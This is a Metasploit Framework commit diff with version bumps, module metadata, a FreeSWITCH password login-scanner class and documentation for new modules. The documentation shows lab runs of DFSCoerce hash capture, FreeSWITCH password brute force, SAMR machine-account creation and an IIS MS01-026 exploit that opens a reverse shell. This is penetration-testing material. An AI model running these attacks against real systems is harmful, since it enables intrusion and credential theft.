automatic module_metadata_base.json update

Use HttpClient; remove meterpreter code; fix stager

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.2.4)
+    metasploit-framework (6.2.6)
       actionpack (~> 6.0)
       activerecord (~> 6.0)
       activesupport (~> 6.0)
@@ -351,7 +351,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.31)
       jsobfu
       metasm
       rex-arch
@@ -383,7 +383,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.38)
     rex-zip (0.1.4)
       rex-text
     rexml (3.2.5)
@@ -427,7 +427,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.6)
       bindata
       openssl-ccm
       openssl-cmac

LICENSE_GEMS

@@ -70,9 +70,9 @@ memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.4, "New BSD"
+metasploit-framework, 6.2.6, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -137,7 +137,7 @@ rex-rop_builder, 0.1.4, "New BSD"
 rex-socket, 0.1.39, "New BSD"
 rex-sslscan, 0.1.7, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.37, "New BSD"
+rex-text, 0.2.38, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -155,7 +155,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.3, "New BSD"
+ruby_smb, 3.1.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT

db/modules_metadata_base.json

@@ -537,6 +537,56 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_admin/dcerpc/samr_computer": {
+    "name": "SAMR Computer Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "Spencer McIntyre"
+    ],
+    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-28 11:53:05 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/samr_computer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_admin/dns/dyn_dns_update": {
     "name": "DNS Server Dynamic Update Record Injection",
     "fullname": "auxiliary/admin/dns/dyn_dns_update",
@@ -19439,7 +19489,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-22 19:44:53 +0000",
     "path": "/modules/auxiliary/gather/memcached_extractor.rb",
     "is_install_path": true,
     "ref_name": "gather/memcached_extractor",
@@ -22199,6 +22249,48 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_scanner/dcerpc/dfscoerce": {
+    "name": "DFSCoerce",
+    "fullname": "auxiliary/scanner/dcerpc/dfscoerce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wh04m1001",
+      "xct_de",
+      "Spencer McIntyre"
+    ],
+    "description": "Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.",
+    "references": [
+      "URL-https://github.com/Wh04m1001/DFSCoerce"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-30 17:38:30 +0000",
+    "path": "/modules/auxiliary/scanner/dcerpc/dfscoerce.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/dcerpc/dfscoerce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/dcerpc/endpoint_mapper": {
     "name": "Endpoint Mapper Service Discovery",
     "fullname": "auxiliary/scanner/dcerpc/endpoint_mapper",
@@ -22344,7 +22436,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2022-01-31 13:50:19 +0000",
+    "mod_time": "2022-06-30 15:12:23 +0000",
     "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/petitpotam",
@@ -38266,6 +38358,53 @@
     "session_types": false,
     "needs_cleanup": false
   },
+  "auxiliary_scanner/misc/freeswitch_event_socket_login": {
+    "name": "FreeSWITCH Event Socket Login",
+    "fullname": "auxiliary/scanner/misc/freeswitch_event_socket_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "krastanoel"
+    ],
+    "description": "This module tests FreeSWITCH Event Socket logins on a range of\n          machines and report successful attempts.",
+    "references": [
+      "URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8021,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-07-01 12:22:31 +0000",
+    "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/misc/freeswitch_event_socket_login",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/misc/ib_service_mgr_info": {
     "name": "Borland InterBase Services Manager Information",
     "fullname": "auxiliary/scanner/misc/ib_service_mgr_info",
@@ -73335,7 +73474,7 @@
     "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
     "references": [
       "CVE-2014-4880",
-      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "armle",
@@ -73350,7 +73489,7 @@
       "DS-7204 Firmware V2.2.10 build 131009",
       "Debug Target"
     ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-06-22 15:49:43 +0000",
     "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -87842,7 +87981,7 @@
       "PHPMailer <5.2.18",
       "PHPMailer 5.2.18 - 5.2.19"
     ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 12:24:29 +0000",
     "path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
     "is_install_path": true,
     "ref_name": "multi/http/phpmailer_arg_injection",
@@ -95463,7 +95602,7 @@
       "Linux",
       "Windows"
     ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-28 17:02:51 +0000",
     "path": "/modules/exploits/multi/misc/nomad_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/misc/nomad_exec",
@@ -95474,11 +95613,11 @@
       "Stability": [
         "crash-safe"
       ],
-      "Reliability": [
+      "SideEffects": [
         "artifacts-on-disk",
         "ioc-in-logs"
       ],
-      "SideEffects": [
+      "Reliability": [
         "repeatable-session"
       ]
     },
@@ -146711,7 +146850,7 @@
     "author": [
       "jduck <jduck@metasploit.com>"
     ],
-    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
+    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          This module has been tested successfully on:\n\n          Windows 2000 Professional (SP0) (EN);\n          Windows 2000 Professional (SP1) (AR);\n          Windows 2000 Professional (SP1) (CZ);\n          Windows 2000 Server (SP0) (FR);\n          Windows 2000 Server (SP1) (EN); and\n          Windows 2000 Server (SP1) (SE).\n\n          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.",
     "references": [
       "CVE-2001-0333",
       "OSVDB-556",
@@ -146723,15 +146862,25 @@
     "arch": "",
     "rport": 80,
     "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
     ],
     "autofilter_services": [
-
+      "http",
+      "https"
     ],
     "targets": [
-      "Automatic"
+      "Windows (Dropper)",
+      "Windows (Command)"
     ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-07-03 18:22:55 +0000",
     "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
     "is_install_path": true,
     "ref_name": "windows/iis/ms01_026_dbldecode",
@@ -146739,6 +146888,16 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
     },
     "session_types": false,
     "needs_cleanup": true

documentation/modules/auxiliary/admin/dcerpc/samr_computer.md

@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```

documentation/modules/auxiliary/scanner/dcerpc/dfscoerce.md

@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```

documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md

@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/exploit/multi/http/phpmailer_arg_injection.md

@@ -18,6 +18,17 @@ exploitation can take a few minutes.
   6.  Verify the module yields a PHP meterpreter session in < 5 minutes
   7.  Verify the malicious PHP file was automatically removed
 
+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios
 
   Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)

documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md

@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+This module will execute an arbitrary payload on a Microsoft IIS installation
+that is vulnerable to the CGI double-decode vulnerability of 2001.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional (SP0) (EN)
+* Windows 2000 Professional (SP1) (AR)
+* Windows 2000 Professional (SP1) (CZ)
+* Windows 2000 Server (SP0) (FR)
+* Windows 2000 Server (SP1) (EN)
+* Windows 2000 Server (SP1) (SE)
+
+Note: This module will leave a Metasploit payload in the IIS scripts directory.
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms01_026_dbldecode`
+1. `set RHOSTS [IP]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+### WINDIR
+
+The Windows directory name of the target host.
+The directory name will be detected automatically if not set.
+
+### DEPTH
+
+Traversal depth to reach the drive root (default: `2`)
+
+## Scenarios
+
+### Windows 2000 Server (SP0) (FR)
+
+```
+msf6 > use exploit/windows/iis/ms01_026_dbldecode
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
+rhosts => 192.168.200.175
+msf6 exploit(windows/iis/ms01_026_dbldecode) > check
+[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
+msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms01_026_dbldecode) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Using Windows directory "winnt"
+[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
+[*] Command Stager progress -  66.67% done (40/60 bytes)
+[*] Command Stager progress - 100.00% done (60/60 bytes)
+[*] Triggering payload "qQErEZeB.exe" via a direct request...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.175
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
+[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+          
+
+c:\inetpub\scripts>hostname
+hostname
+win2k-srv-fr
+```

lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb

@@ -0,0 +1,80 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with FreeSWITCH EventSocket.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+
+      class FreeswitchEventSocket
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 8021
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'freeswitch' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: 'freeswitch'
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock], nil, nil, 0.4)
+
+            sock.get_once
+            sock.put("auth #{credential.private}\n\n")
+
+            /Reply-Text: (?<reply>.*)/ =~ sock.get_once
+            result_options[:proof] = reply
+
+            # Invalid password - ( -ERR invalid\n\n )
+            # Valid password   - ( +OK accepted\n\n )
+
+            if result_options[:proof]&.include?('-ERR invalid')
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            elsif result_options[:proof]&.include?('+OK accepted')
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE, Rex::StreamClosedError => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+          disconnect if self.sock
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout  ||= 10
+          self.port                ||= DEFAULT_PORT
+          self.max_send_size       ||= 0
+          self.send_delay          ||= 0
+        end
+      end
+    end
+  end
+end

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.2.4"
+      VERSION = "6.2.6"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/auxiliary/juniper.rb

@@ -3,257 +3,278 @@
 require 'metasploit/framework/hashes/identify'
 
 module Msf
+  ###
+  #
+  # This module provides methods for working with Juniper equipment
+  #
+  ###
+  module Auxiliary::Juniper
+    include Msf::Auxiliary::Report
 
-###
-#
-# This module provides methods for working with Juniper equipment
-#
-###
-module Auxiliary::Juniper
-  include Msf::Auxiliary::Report
+    def juniper_screenos_config_eater(thost, tport, config)
+      # this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
+      # It is similar to cisco, however it doesn't always put all fields we care
+      # about on one line.
+      # Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
+      #       ppp  -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
+      #       ike  -> https://kb.juniper.net/KB4147
+      #       https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
 
-  def juniper_screenos_config_eater(thost, tport, config)
-    # this is for the netscreen OS, which came on SSG (ie SSG5) type devices.
-    # It is similar to cisco, however it doesn't always put all fields we care
-    # about on one line.
-    # Docs: snmp -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB4223
-    #       ppp  -> https://kb.juniper.net/InfoCenter/index?page=content&id=KB22592
-    #       ike  -> https://kb.juniper.net/KB4147
-    #       https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L171
+      report_host({
+        host: thost,
+        os_name: 'Juniper ScreenOS'
+      })
 
-    report_host({
-      :host => thost,
-      :os_name => 'Juniper ScreenOS'
-    })
-
-    if framework.db.active
-      credential_data = {
-        address: thost,
-        port: tport,
-        protocol: 'tcp',
-        workspace_id: myworkspace_id,
-        origin_type: :service,
-        service_name: '',
-        private_type: :nonreplayable_hash,
-        module_fullname: self.fullname,
-        status: Metasploit::Model::Login::Status::UNTRIED
-      }
-    end
-
-    store_loot('juniper.netscreen.config', 'text/plain', thost, config.strip, 'config.txt', 'Juniper Netscreen Configuration')
-
-    # admin name and password
-    # Example lines:
-    # set admin name "netscreen"
-    # set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
-    config.scan(/set admin name "(?<admin_name>[a-z0-9]+)".+set admin password "(?<admin_password_hash>[a-z0-9]+)"/mi).each do |result|
-      admin_name = result[0].strip
-      admin_hash = result[1].strip
-      print_good("Admin user #{admin_name} found with password hash #{admin_hash}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = admin_name
-      cred[:private_data] = admin_hash
-      create_credential_and_login(cred)
-    end
-
-    # user account
-    # Example lines:
-    # set user "testuser" uid 1
-    # set user "testuser" type auth
-    # set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
-    # set user "testuser" enable
-    config.scan(/set user "(?<user_name>[a-z0-9]+)" uid (?<user_uid>\d+).+set user "\k<user_name>" type (?<user_type>\w+).+set user "\k<user_name>" hash-password "(?<user_hash>[0-9a-z=]{38})".+set user "\k<user_name>" (?<user_enable>enable).+/mi).each do |result|
-      user_name = result[0].strip
-      user_uid  = result[1].strip
-      user_enable = result[4].strip
-      user_hash = result[3].strip
-      print_good("User #{user_uid} named #{user_name} found with password hash #{user_hash}. Enable permission: #{user_enable}")
-      next unless framework.db.active
-      cred = credential_data.dup
-      cred[:username] = user_name
-      cred[:jtr_format] = 'sha1'
-      cred[:private_data] = user_hash
-      create_credential_and_login(cred)
-    end
-
-    # snmp
-    # Example lines:
